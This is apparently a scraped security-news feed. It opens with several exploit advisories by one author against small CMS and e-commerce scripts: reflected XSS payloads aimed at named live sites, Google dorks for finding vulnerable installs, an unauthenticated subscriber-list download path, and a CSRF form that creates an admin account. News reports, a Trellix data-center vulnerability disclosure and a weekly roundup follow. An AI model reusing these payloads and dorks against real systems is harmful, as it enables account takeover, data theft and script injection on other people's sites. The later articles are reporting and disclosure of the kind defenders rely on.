Education Time Indonesian School CRM version 1.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Education Time Indonesian School CRM v 1.7 Xss Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir                                                                                                   |  | # Dork      : "media.php?module=detailberita&id="                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberita[+] http://wwumpalangkarayaacid//unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberitaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Education Time Indonesian School CRM 1.7 Cross Site Scripting

Eden CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Eden CMS v1.02 Xss Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://edendesign.be/fr/                                                                                          |  | # Dork      : intext:"Website by Eden Design"                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352[+]  http://www/miniartextilit/artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352        Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Eden CMS 1.02 Cross Site Scripting

Ecommerce Responsive version 1.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce Responsive v1.2 Insecure Direct Object Reference Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ecommerce-responsive-ecommerce-business-management-script/21413994                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Any visitor can export and download a subscriber list .[+] use payload : /admin/subscriber-csv.php[+] https://www/demoslycom/xicia/cc/ecommerce/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ecommerce Responsive 1.2 Insecure Direct Object Reference

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : E-Biz CMS v2.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : https://softech.pk/                                                                                                |    
| # Dork      : Copyright © 2019, Designed By SOFTECH                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

    <h1>Add User</h1>  
    </div>  
      
    <div class="site">  
      <div class="container">  
        <div class="grid-16">

                          <div class="widget" >  
            <div class="widget-header"> <span class="icon-wrench"></span>  
              <h3>Add User </h3>  
            </div>  
              
            <div class="widget-content">  
                
                
                
              <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
                <table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
                  <tr>  
                    <td width="527" align="left"><strong>Name : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Email :</strong> </td>  
                  </tr>  
                  <tr>  
                    <td><span class="field">  
                      <input name="email"  type="text" id="date"  class="validate[required,custom[email]" size="50" />  
                    </span></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Password :</strong></td>  
                  </tr>  
                  <tr>  
                    <td><div class="field">  
                    <input name="password"  type="text" id="date_English" class="validate[required]" size="50" />          
                  </div> </td>  
                  </tr>  
                  <tr>  
                    <td><strong>Access : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><select name="type" id="type" >  
                        <option value="user" selected="selected">User</option>  
                      <option value="admin">Admin</option>  
                    </select>                           </td>  
                  </tr>  
                  <tr id="link">  
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
                        <tr>  
                          <td height="30"><strong id="">Privileges:</strong></td>  
                        </tr>  
                        <tr>  
                          <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

                                                        <tr>  
                              <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
                                <tr>  
                                  <td height="25"><label for="label">Company News</label></td>  
                                  <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25">Home Banners</td>  
                                  <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Gallery</td>  
                                  <td><input type="checkbox" id="gal" name="gallery" value="Y"  onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25"><label for="sim">Simple Gallery</label></td>  
                                  <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y"  onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                                                                                                                                                                                                              <tr>  
                                  <td height="25">Pages</td>  
                                  <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Newsletter</td>  
                                  <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                                  <tr>  
                                  <td height="25">Categories</td>  
                                  <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                             </table>                                </td>  
                            </tr>

                                                      </table>                            </td>  
                        </tr>  
                      </table></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>

                                                      <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                </table>  
                </td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>                                          </td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td><button  name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

  <button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
                  </tr>  
                </table>  
              </form>  
            </div>

Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================

E-Biz CMS 2.0 Cross Site Request Forgery

EasyPX CMS version 06.02.04 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : EasyPX CMS V06.02.04 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.domphp.com/                                                                                             || # Dork      : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects : /tst/index.php    URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="    The input is reflected inside a tag parameter between double quotes.    URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>    URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>    URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>    URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

EasyPX CMS 06.02.04 Cross Site Scripting

E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023.
The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in Adobe Commerce and Magento Open Source that, if successfully exploited, could lead to arbitrary code execution.
"The attacker seems to be

Website Security / Vulnerability

E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023.

The attacks, dubbed **Xurum** by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in Adobe Commerce and Magento Open Source that, if successfully exploited, could lead to arbitrary code execution.

"The attacker seems to be interested in payment stats from the orders in the victim's Magento store placed in the past 10 days," Akamai researchers said in an analysis published last week, attributing the campaign to actors of Russian origin.

Some of the websites have also been observed to be infected with simple JavaScript-based skimmers that's designed to collect credit card information and transmit it to a remote server. The exact scale of the campaign remains unclear.

In the attack chains observed by the company, CVE-2022-24086 is weaponized for initial access, subsequently exploiting the foothold to execute malicious PHP code that gathers information about the host and drops a web shell named wso-ng that masquerades as a Google Shopping Ads component.

Not only is the web shell backdoor run in memory, it also activated only when the attacker sends the cookie "magemojo000" in the HTTP request, after which information about the sales order payment methods in the past 10 days is accessed and exfiltrated.

The attacks culminate with the creation of a rogue admin user with the name "mageworx" (or "mageplaza") in what appears to be a deliberate attempt to camouflage their actions as benign, for the two monikers refer to popular Magento 2 extension stores.

wso-ng is said to be an evolution of the WSO web shell, incorporating a new hidden login page to steal credentials entered by victims. It further integrates with legitimate tools like VirusTotal and SecurityTrails to glean the infected machine's IP reputation and obtain details about other domains hosted on the same server.

Online shopping sites have been targeted for years by a class of attacks known as Magecart in which skimmer code is inserted into checkout pages with the goal of harvesting payment data entered by victims.

"The attackers have shown a meticulous approach, targeting specific Magento 2 instances rather than indiscriminately spraying their exploits across the internet," the researchers said.

"They demonstrate a high level of expertise in Magento and invest considerable time in understanding its internals, setting up attack infrastructure, and testing their exploits on real targets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ongoing Xurum Attacks on E-commerce Sites Exploiting Critical Magento 2 Vulnerability

Germany's Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022.
"The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran," the agency said in an advisory.
The

Germany's Federal Office for the Protection of the Constitution (BfV) has warned of cyber attacks targeting Iranian persons and organizations in the country since the end of 2022.

"The cyber attacks were mainly directed against dissident organizations and individuals – such as lawyers, journalists, or human rights activists – inside and outside Iran," the agency said in an advisory.

The intrusions have been attributed to a threat actor called Charming Kitten, which is also tracked under the names APT35, Mint Sandstorm, TA453 and Yellow Garuda.

While Iranian nation-state actors lag behind their Russian and Chinese counterparts in sophistication, they have demonstrated a continued advancement of tools and techniques, adding an arsenal of custom malware to facilitate information gathering and rapidly exploiting n-day security flaws to obtain initial access.

Charming Kitten, in particular, has a long, storied history of leveraging elaborate social engineering and fictitious online identities that are tailor-made to target victims. It also impersonates real journalists and NGO employees in a bid to build rapport and increase the likelihood of success of the attacks.

Once a successful contact is made, the hacking crew has been observed sending links to an online video chat that, when clicked, urge victims to enter their login information on a phishing page, effectively resulting in credential theft. The phishing site impersonates a legitimate online service provider such as Google or Microsoft.

"If an online video chat occurs, it serves to conceal the attack," BfV said. "After logging in to the victim's user account from a C2 server6, the attacker is able to download the entire user data, e.g. by means of Google Takeout."

It's worth noting that the Google Threat Analysis Group (TAG), in August 2022, detailed a malware called HYPERSCRAPE used by the threat actor to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts.

The attacks also mirror prior findings from Certfa Lab and Human Rights Watch (HRW), which disclosed a credential phishing campaign aimed at human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East around the same time.

The development comes as Sophos revealed a mobile malware campaign targeting customers of four Iranian banks, Bank Mellat, Bank Saderat, Resalat Bank, and Central Bank of Iran, with as many as 40 bogus Android apps designed to steal sensitive information.

"All the apps, which were available for download between December 2022 and May 2023, collect internet banking login credentials and credit card details, and have several other capabilities," security researcher Pankaj Kohli said in a report published late last month.

This includes "hiding their icons to maintain stealth and intercepting incoming SMS messages which some banks use as part of multi-factor authentication schemes." Also present is a feature to search the infected device for several other apps relating to banking, payment, or cryptocurrency.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Charming Kitten Targets Iranian Dissidents with Advanced Cyber Attacks

Categories: Podcast
This week on Lock and Code, we speak with Heather Kelly about why how parents are using AirTags to give their kids freedom. 



(Read more...)




The post A new type of "freedom," or, tracking children with AirTags, with Heather Kelly: Lock and Code S04E17 appeared first on Malwarebytes Labs.

Posted: August 14, 2023 by

"Freedom" is a big word, and for many parents today, it's a word that includes location tracking. 

Across America, parents are snapping up Apple AirTags, the inexpensive location tracking devices that can help owners find lost luggage, misplaced keys, and—increasingly so—roving toddlers setting out on mini-adventures. 

The parental fear right now, according to The Washington Post technology reporter Heather Kelly, is that "anybody who can walk, therefore can walk away." 

Parents wanting to know what their children are up to is nothing new. Before the advent of the Internet—and before the creation of search history—parents read through diaries. Before GPS location tracking, parents called the houses that their children were allegedly staying at. And before nearly every child had a smart phone that they could receive calls on, parents relied on a much simpler set of tools for coordination: Going to the mall, giving them a watch, and saying "Be at the food court at noon." 

But, as so much parental monitoring has moved to the digital sphere, there's a new problem: Children become physically mobile far faster than they become responsible enough to _own a mobile_. Enter the AirTag: a small, convenient device for parents to affix to toddlers' wrists, place into their backpacks, even sew into their clothes, as Kelly reported in her piece for The Washington Post. 

In speaking with parents, families, and childcare experts, Kelly also uncovered an interesting dynamic. Parents, she reported, have started relying on Apple AirTags as a means to provide _freedom_, not restrictions, to their children. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Kelly about why parents are using AirTags, how childcare experts are reacting to the recent trend, and whether the devices can actually provide a balm to increasingly stressed parents who may need a moment to sit back and relax. Or, as Kelly said:

> "In the end, parents need to chill—and if this lets them chill, and if it doesn't impact the kids too much, and it lets them go do silly things like jumping in some puddles with their friends or light, really inconsequential shoplifting, good for them."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

A new type of "freedom," or, tracking children with AirTags, with Heather Kelly: Lock and Code S04E17

The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier uses hard-coded credentials for all interactions with the internal Postgres database.A malicious agent with the ability to execute operating system commands on the device can leverage this vulnerability to read, modify, or delete arbitrary database records.

**Summary**

In a modern working environment where many employees are working from home or in hybrid office environments, businesses small and large have turned to digital transformation and cloud services to support new working habits and operational efficiencies. Connected devices in the home are more prevalent than ever, and consumers increasingly rely on their smartphones and internet services for daily tasks. An uncountable number of government organizations and services similarly rely on online tools and cloud applications to support their daily operations.

The world has become increasingly reliant on data and the data center infrastructure that supports the foundation of our internet services. From small server houses businesses have on-premises to hyperscale colocation data centers operated by Amazon, Google, Microsoft, or another major enterprise, today's data centers are a critical attack vector for cybercriminals wanting to spread malware, blackmail businesses for ransom, conduct corporate or foreign espionage, or simply shut down large swaths of the Internet.

This blog is the first of a multi-part series focused on vulnerability discovery in data centers, investigating several widely used management platforms and technologies present in data centers. Thus, this research involves several vendors with whom our team has coordinated to disclose and patch these vulnerabilities to protect this incredibly critical industry. For this first blog, our team specifically looked into power management and supply technologies commonly found in data centers.

**Introduction**

It's clear that protecting the data center infrastructure that supports so many functions of our society is paramount. The Trellix Advanced Research Center regularly identifies critical vulnerabilities to expose and reduce attack surfaces. In alignment with the recently announced 2023 National Cybersecurity Strategy, our team investigated several data center software platforms and hardware technologies to help protect national critical infrastructures and drive security resilience across the digital ecosystem.

During this practice, we found four vulnerabilities in CyberPower's PowerPanel Enterprise Data Center Infrastructure Management (DCIM) platform and five vulnerabilities in Dataprobe's iBoot Power Distribution Unit (PDU). An attacker could chain these vulnerabilities together to gain full access to these systems – which alone could be leveraged to commit substantial damage. Furthermore, both products are vulnerable to remote code injection that could be leveraged to create a backdoor or an entry point to the broader network of connected data center devices and enterprise systems.

CyberPower is a leading vendor of data center equipment and infrastructure solutions, specializing in power protection technologies and power management systems. Their PowerPanel Enterprise DCIM platform allows IT teams to manage, configure, and monitor the infrastructure within a data center through the cloud, serving as a single source of information and control for all devices. These platforms are commonly used by companies managing on-premise server deployments to larger, co-located data centers – like those from major cloud providers AWS, Google Cloud, Microsoft Azure, etc.

According to Sunbird Software, 83% of enterprise data center operators have increased their rack densities in the last three years – and thus are looking to tools like DCIM platforms to help manage their infrastructure, prevent outages, and maintain uptime. This is reflected in the market predictions. The DCIM market reached $2 billion in 2022 and is projected to continue growing at a CAGR of 20%, reaching $20 billion in 2032. Thus, DCIM services like CyberPowers are adopted widely across the entire industry.

Dataprobe manufactures power management products that assist businesses in monitoring and controlling their infrastructure. Their iBoot PDU allows administrators to remotely manage the power supply to their devices and equipment via a simple and easy-to-use web application. Dataprobe has thousands of devices across numerous industries – from deployments in data centers, travel and transportation infrastructure, financial institutions, smart city IoT installations, and government agencies.

The iBoot PDU specifically has been in service since 2016, with thousands of these PDUs utilized for tasks including digital signage, telecommunications, remote site management, and much more. Back in 2021, exposure management company Censys found that over 750 iBoot PDUs were reachable over the internet. As this search didn’t include devices managed by a cloud service behind a firewall, the actual number of internet accessible iBoot PDUs was likely much higher.

The team found four major vulnerabilities in CyberPower's PowerPanel Enterprise and five critical vulnerabilities in the Dataprobe's iBoot PDU:

*   **CyberPower PowerPanel Enterprise:**
    *   CVE-2023-3264: Use of Hard-coded Credentials (CVSS 6.7)
    *   CVE-2023-3265: Improper Neutralization of Escape, Meta, or Control Sequences (Auth Bypass; CVSS 7.2)
    *   CVE-2023-3266: Improperly Implemented Security Check for Standard (Auth Bypass; CVSS 7.5)
    *   CVE-2023-3267: OS Command Injection (Authenticated RCE; CVSS 7.5)
*   **Dataprobe iBoot PDU:**
    *   CVE-2023-3259: Deserialization of Untrusted Data (Auth Bypass; CVSS 9.8)
    *   CVE-2023-3260: OS Command Injection (Authenticated RCE; CVSS 7.2)
    *   CVE-2023-3261: Buffer Overflow (DOS; CVSS 7.5)
    *   CVE-2023-3262: Use of Hard-coded Credentials (CVSS 6.7)
    *   CVE-2023-3263: Authentication Bypass by Alternate Name (Auth Bypass; CVSS 7.5)

**Impact**

In a world growing ever-reliant on massive amounts of data for business operations, critical infrastructure, and basic internet activities, major vulnerabilities in the data centers making all this possible is a large risk to daily society. Vulnerabilities that enable cybercriminals to slowly infect entire data center deployments to steal key data and information or utilize compromised resources to initiate attacks at a global scale could be leveraged for massive damage. The threats and risks to both consumers and enterprises is high.

Below are some examples of the level of damage a malicious threat actor could do when utilizing exploits of this level across numerous data centers:

*   **Power Off:**Through access to these power management systems, even the simple act of cutting power to devices connected to a PDU would be significant. Websites, business applications, consumer technologies, and critical infrastructure deployments all rely on the availability of these data centers to operate. A threat actor could cause significant disruption for days at a time with the simple "flip of a switch" in dozens of compromised data centers.
    *   Furthermore, manipulation of the power management can be used to damage the hardware devices themselves – making them far less effective if not inoperable. Data from the Uptime Institute shows that the costs of data center outages are on the rise. Today, 25% of outages cost more than $1 million, and 45% cost between $100,000 and $1 million. This translates to thousands or tens of thousands of dollars lost for every minute an organization’s data center doesn’t have power.
*   **Malware at Scale:** Using these platforms to create a backdoor on the data center equipment provides bad actors a foothold to compromise a huge number of systems and devices. Some data centers host thousands of servers and connect to hundreds of various business applications. Malicious attackers could slowly compromise both the data center and the business networks connected to it.
    *   Malware across such a huge scale of devices could be leveraged for massive ransomware, DDoS, or Wiper attacks – potentially even more widespread than those of StuxNet, Mirai BotNet, or WannaCry.
*   **Digital Espionage:** In addition to the previously mentioned malicious activities one would expect of cybercriminals, APTs and nation-state backed threat actors could leverage these exploits to conduct cyberespionage attacks.
    *   The 2018 concerns of spy chips in data centers would become a digital reality if spyware installed in data centers worldwide were to be leveraged for cyber espionage to inform foreign nation-states of sensitive information.

As discussed in the June edition of Trellix's CyberThreat Report, cloud infrastructure attacks continue to rise following the digital transformation trend many organizations adopted to support work-from-home or hybrid workforces during the COVID-19 pandemic. As more and more businesses seek to expand their on-premises deployments or turn to a more affordable and scalable cloud infrastructure from Amazon, Microsoft, Google, and others, this has created a growing attack vector for threat actors.

Though attackers are also escalating the usage of more sophisticated attacks on data center infrastructure, like MFA attacks, proxies, and API execution, the most prominent attack technique continues to be through valid accounts, which is more than double the 2nd most commonly used attack vector. The risk of "rogue access" to organizations is very real, as cybercriminals utilize legitimate account logins – whether bought and sold on the dark web or acquired through exploits like those discussed in this research – to enterprise platforms and business websites to infiltrate and conduct attacks.

Furthermore, analysis of the "Leak Site" data of many prominent cybercriminal groups indicates that small and medium sized businesses tend to be the primary victims of their attacks. However, even these smaller organizations offer threat actors high "value" in compromising their data center infrastructure. A vulnerability on a single data center management platform or device can quickly lead to a complete compromise of the internal network and give threat actors a foothold to attack any connected cloud infrastructure further.

We are fortunate enough to have caught these vulnerabilities early – without having discovered any malicious uses in the wild of these exploits. However, data centers are attractive targets for cybercriminals due to the number of attack vectors and the ability to scale their attacks once a foothold has been achieved. Thus, we consider it imperative to continue this research and coordinate with data center software and hardware vendors to address and disclose potential threats to such a core part of our IT infrastructure.

**Demo Video**

Our team disclosed more details of how these vulnerabilities were discovered and could have been exploited in our presentation at DEFCON at 2pm Pacific Time on Saturday, August 12.

**Recommendation**

As of publication of this blog, both Dataprobe and CyberPower have released fixes for these vulnerabilities with version 2.6.9 of their PowerPanel Enterprise software and the latest 1.44.08042023 version of the Dataprobe iBoot PDU firmware. We strongly urge all potentially impacted customers to download and install these patches immediately.

In addition to the official patches, we would suggest taking additional steps for any devices or platforms potentially exposed to 0-day exploitation by these vulnerable products:

*   Ensure that your PowerPanel Enterprise or iBoot PDU are not exposed to the wider Internet. Each should be reachable only from within your organization's secure intranet.

*   In the case of the iBoot PDU, we suggest disabling remote access via Dataprobe's cloud service as an added precaution.

*   Modify the passwords associated with all user accounts and revoke any sensitive information stored on both appliances that may have been leaked.
*   Update to the latest version of PowerPanel Enterprise or install the latest firmware for the iBoot PDU and subscribe to the relevant vendor's security update notifications.

*   Although this measure in and of itself will not reduce risk of attack via the vulnerabilities described in this document, updating all your software to the latest and greatest version promptly is the best practice for ensuring your window of exposure is as short as possible in this and future cases.

*   Finally, Trellix Customers are also protected with endpoint (EDR), and network (NX, Helix) detections of these vulnerabilities.

**Conclusion**

Thanks to the explosion of IoT devices and AI applications in the past few decades, connected technologies today are a part of nearly every aspect of daily life – from the home to the enterprise. The services and capabilities enabled through the latest internet technologies greatly influence societal and cultural changes, as was experienced throughout the COVID-19 pandemic.

With how incredibly significant these services are for consumers and businesses, it's clear that cybersecurity for the data centers making them possible is essential. It isn't wrong to say today that proper cybersecurity posture and defenses for data centers are essential to the basic functioning of our economy and society. This level of importance makes them a target for threat actors looking to implement attacks on nation-states, ransom critical infrastructure, or conduct espionage for foreign nations.

Thus, the devices and software platforms that service data centers must remain secure and updated, and the vendors producing this hardware and software have processes in place for quick and efficient response following vulnerability disclosures.

We applaud both CyberPower and Dataprobe for their willingness and expediency in working with our team following the discovery of these vulnerabilities. Their responsiveness in creating protections for these vulnerabilities and releasing a patch for their customers shows true organizational maturity and drive to improve security across the entire industry.

_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability._

CVE-2023-3262: The Threat Lurking in Data Centers – Hack Power Management Systems, Take All the Power

A pair of major data breaches rock the UK, North Korea hacks a Russian missile maker, and Microsoft’s Chinese Outlook breach sparks new problems.

Of course, generative AI tools are the talk of the security industry this year. And Microsoft is no exception. In fact, since 2018, the company has had an AI red team that attacks AI tools to find vulnerabilities and help prevent them from behaving badly.

Outside of Black Hat and Defcon coverage, we detailed the ins and outs of the data privacy that HIPPA provides people in the US, and explained how to use Google's new “Results About You” tool to get your personal information removed from search results.

But that’s not all. Each week, we round up the security news that we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Your keyboard may be exposing your secrets without you even knowing it. Researchers in the UK developed a deep-learning algorithm that can figure out what a person is typing just by listening to keystrokes. In a best-case scenario (for an attacker, that is), the algorithm is 95 percent accurate. The researchers even tested it over Zoom and found it performed with 93 percent accuracy.

Now, if you’re thinking the researchers tested the attack on the noisiest mechanical keyboard they could find, you’d be wrong. They performed their tests on a MacBook Pro. And the attack doesn’t even require fancy recording equipment—a phone’s microphone works just fine. Someone who successfully carries out the attack could use it to learn a target’s passwords or snoop on their conversations. These kinds of acoustic attacks aren’t new, but this research shows they’re getting frighteningly accurate and easier to pull off in the wild.

A series of data breaches rocked the United Kingdom this week. On August 8, the Electoral Commission, the independent body responsible for overseeing elections and regulating political finances, revealed a cyberattack had exposed the data of 40 million voters to hackers. The organization has been unable to determine whether data was taken; however, it says that full names, emails, phone numbers, home addresses, and data provided during contact with the body could be impacted. “The attack has not had an impact on the electoral process,” the commission said. (Elections are run by local councils.)

The commission has, however, been criticized for how it communicated the cyberattack: The incident happened in August 2021 but was detected only in October 2022, and then finally communicated to the public nine months later. It has also been reported the breach may be linked to an unpatched Microsoft Exchange zero-day.

But that wasn’t all. The same day, the Police Service of Northern Ireland (PSNI) accidentally published the names and roles of 10,000 officers and staff in response to a Freedom of Information request. The breach, arguably, has more significant ramifications than that of the Electoral Commission. Officers working in intelligence and security services were included in the breach, which stayed online for three hours. The PSNI blamed “human error” for the breach, and the British data regulator, the Information Commissioner’s Office, has opened an investigation. (Previously, the regulator has issued guidance on making sure information is not accidentally disclosed via spreadsheets.) Since the breach, officers have expressed concerns about their safety, and the police service has been reviewing moving people to different roles for safety reasons.

North Korean hackers don’t just steal cryptocurrency, they also may have stolen Russia’s missile secrets. According to Reuters, the state-linked hacking group Lazarus breached the networks of NPO Mashinostroyeniya, a major Russian missile manufacturer, in late 2021. The breach wasn’t detected until May 2022. A researcher with the cybersecurity firm SentinelOne who discovered the breach said that the hackers would have had “the ability to read email traffic, jump between networks, and extract data,” Reuters reports.

It is unclear what exactly the Lazarus hackers stole while inside the NPO network, although North Korea did announce several updates to its missile program following the breach, so the two may be linked.

Last month, Microsoft revealed damning news: China-based hackers stole a digital key that the company uses to cryptographically sign tokens that are assigned to users when they log in to their Outlook email accounts. The hackers used this stunning access to break into the Outlook accounts of at least 25 organizations, including government bodies. But that’s only the start of the problems for Microsoft.

US senator Ron Wyden, an Oregon Democrat, sent a letter this week demanding three federal inquiries into Microsoft’s “negligent cybersecurity practices,” _The Wall Street Journal_ reports. Wyden also asked that the Cyber Safety Review Board, which the Biden administration created to investigate cybersecurity incidents, also look into the incident. And according to Bloomberg News, the review board is already planning to do just that.

Wyden’s letter, which is dated July 27, demands that the Department of Justice, the Federal Trade Commission, and the Cybersecurity and Infrastructure Security Agency all launch investigations. Microsoft, for its part, tells the _Journal_ that it plans to fully cooperate with any federal inquiries into the hack.

Tag

#google